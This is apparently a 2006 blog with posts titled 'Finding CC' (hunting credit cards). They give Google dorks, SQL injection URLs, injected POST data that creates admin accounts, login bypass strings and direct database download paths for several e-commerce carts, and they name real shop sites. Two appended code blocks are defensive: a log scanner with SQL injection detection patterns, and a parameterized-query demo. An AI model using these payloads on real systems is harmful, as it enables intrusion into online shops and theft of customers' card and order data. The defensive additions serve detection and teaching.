Friday, December 8, 2006

Changing the Default Administrator Ownership

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
Create a new DWORD Value and name it NoDefaultAdminOwner.
Double-click NoDefaultAdminOwner and enter 1 in Value Data.

Saturday, July 15, 2006

Finding CC, Part 3

VP-ASP Shopping Cart 5.0

SQL injection vulnerability in the 'shopdisplayproducts.asp' script
keyword allinurl:/vpasp/shopdisplayproducts.asp
Open the target URL and append the following string after shopdisplayproducts.asp
http://.../vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'--
Keep changing the value at the end of the URL string to:
%20'a%25'--
%20'b%25'--
%20'c%25'--
etc...
If it succeeds, we get the admin username and password information!
The admin login is at http://.../vpasp/shopadmin.asp

VP-ASP Shopping Cart 5.0

SQL injection vulnerability in the 'shopsearch.asp' script
keyword allinurl:/vpasp/shopsearch.asp
Open the target URL and, to create a new admin,
post the following data one at a time into the search engine section:
Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6
don't forget to change and to your liking!:
To change the admin password, enter the following keyword:
Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
The admin login is at http://.../vpasp/shopadmin.asp
Google keywords: cart, METACART
Exploit details:
Direct access at the target URL to the location of the
database file on a site that has the metacart system installed.
Formula:
http://targetshop/database/metacart.mdb
http://Targetshop/metacart/database/metacart.mdb

Friday, July 14, 2006

Finding CC, Part 2

Collection of Shopadmin Exploits

google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/...ir_Manuals.htm
with the bug applied : http://www.target.com/cgi-bin/store/...iles/order.log
keyword : inurl:"/cart.php?m="
Bugs : Admin
replace cart.php?m=view with admin
log in using SQL injection :
username :'or"="
Password : 'or"="
Keyword : /ashopKart20/"
bugs : replace the text in front of it with admin/scart.mdb
example : www.garrysun.com/ashopkart20/addprod.asp
Injection : www.garrysun.com/ashopkart20/admin/scart.mdb
keyword : /shop/category.asp/catid=
Bugs : delete /shop/category.asp?catid=2 and replace it with /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
with the bug applied it becomes : www.littlesport.net//admin/dbsetup.asp
then replace that bug with /data/pdshoppro.mdb
keyword : inurl:"/store/proddetail.asp?prod="
bugs : replace proddetail.asp?prod= with fpdb/vsproducts.mdb
google dork : "Powered by SunShop 3.2"
Or google dork : inurl:"/sunshop/index.php?action="
Bugs : replace index.php with admin
Example: http://www.domain.com/sunshop/index.php
replaced with admin: http://www.domain.com/sunshop/admin
Log in using SQL injection :
Username : admin
Password :'or''='
Google dork : "Powered by Digishop 3.2"
Bugs : replace cart.php?m= with admin
Username : 'or"="
Password : 'or"="
google dork : inurl:"mall/lobby.asp"
bugs : replace /mall/lobby.asp with fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
http://www.gemdepot.com/fpdb/shop.mdb
keyword allinurl:/DCShop/
bug: /DCShop/orders/orders.txt or
/DCShop/Orders/orders.txt
keyword allinurl:/eshop/
bug: /cg-bin/eshop/database/order.mdb
example: http://www.contoh.com/.../cg-bin/eshop/database/order.mdb
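
Every item in this list comes down to a data file (.mdb database, order log, setup page) being served from inside the web root, or to SQL text arriving in a query string. The following is an added example, not part of the original post: a defender's access-log check for both patterns, run over constructed sample lines in Common Log Format (the IP addresses and sample requests are assumptions).

```python
import re
from urllib.parse import unquote_plus

# Data-file paths of the kind this page shows being fetched over HTTP.
DATA_FILE = re.compile(r"\.mdb$|/order\.log$|/orders\.txt$|/dbsetup\.asp$", re.I)
# SQL fragments of the kind this page places in query strings.
SQLI = re.compile(r"union\s+select|;\s*(insert|update)\s|'\s*or\s*['\"]|'\s*--", re.I)
# Common Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def classify(line):
    """Return (ip, rule, path) for a suspicious request, else None."""
    m = LOG.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    path, _, query = target.partition("?")
    if DATA_FILE.search(unquote_plus(path)):
        # Status 200 means the file was actually handed out, not just probed.
        rule = "data-file-served" if status == "200" else "data-file-probe"
        return (ip, rule, path)
    if SQLI.search(unquote_plus(query)):
        return (ip, "sqli-in-query", path)
    return None


def scan(lines):
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges).
SAMPLE = [
    '203.0.113.7 - - [14/Jul/2006:10:00:01 +0000] "GET /shop/database/comersus.mdb HTTP/1.1" 200 482304',
    '203.0.113.7 - - [14/Jul/2006:10:00:03 +0000] "GET /DCShop/orders/orders.txt HTTP/1.1" 404 210',
    "198.51.100.9 - - [14/Jul/2006:10:02:11 +0000] \"GET /vpasp/shopdisplayproducts.asp"
    "?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser HTTP/1.1\" 200 5120",
    '192.0.2.44 - - [14/Jul/2006:10:05:40 +0000] "GET /shop/category.asp?catid=2 HTTP/1.1" 200 7312',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit)
```

A `data-file-served` hit means the file has to be treated as disclosed; the durable fix is to keep databases and order logs outside the web root. Payloads sent in POST bodies do not appear in access logs and need application or WAF logging to catch.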

Wednesday, July 12, 2006

Finding CC, Part 1

Comersus Bug

Google dork:
allinurl:"Powered by COmersus"
allinurl:/shopdisplaycategories.asp
allinurl:/comersus_backoffice_login.php
allinurl:/backoffice/
allinurl:/backofficegold/
allinurl:/comersus_contactUs.asp
Example admin login locations:
For the logins above you can perform SQL injection as shown below:
http://www.sheardelight.net/backofficegold/
login : ' OR adminname <> '' OR adminname = '
pass : ' OR adminname <> '' OR adminname = '
If injection doesn't work, you can download the database here
Example database locations:
http://latintradingbooks.com/comersus/database/comersus.mdb
http://www.braziliancd.com/Comersus/database/comersus.mdb
http://www.sidewindercycle.com/database/comersus.mdb
http://www.sillyprat.co.uk/shop/database/comersus.mdb
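
The login string above works only where the application splices form input directly into its SQL text. The following is an added example, not Comersus code and not from the original post: the concatenated login pattern beside a parameterized one, using an in-memory SQLite database. The table name, every column except `adminname`, and the sample password are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "' OR adminname <> '' OR adminname = '"  # login string quoted on this page


def kdf(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def make_db() -> sqlite3.Connection:
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (adminname TEXT PRIMARY KEY, "
               "adminpassword TEXT, salt BLOB, pwhash BLOB)")
    salt, pw = os.urandom(16), "constructed-sample-pw"
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", pw, salt, kdf(pw, salt)))
    return db


def login_concatenated(db, name: str, password: str) -> bool:
    # Legacy pattern: input becomes part of the SQL text, so a quote in the
    # input rewrites the WHERE clause instead of being compared as a value.
    sql = ("SELECT adminname FROM admins WHERE adminname = '" + name +
           "' AND adminpassword = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, name: str, password: str) -> bool:
    # Bound parameter: the input is only ever data. The password is checked
    # against a salted PBKDF2 hash in application code, in constant time.
    row = db.execute("SELECT salt, pwhash FROM admins WHERE adminname = ?",
                     (name,)).fetchone()
    if row is None:
        return False
    salt, pwhash = row
    return hmac.compare_digest(kdf(password, salt), pwhash)


if __name__ == "__main__":
    db = make_db()
    print("concatenated accepts payload: ", login_concatenated(db, PAYLOAD, PAYLOAD))
    print("parameterized accepts payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
```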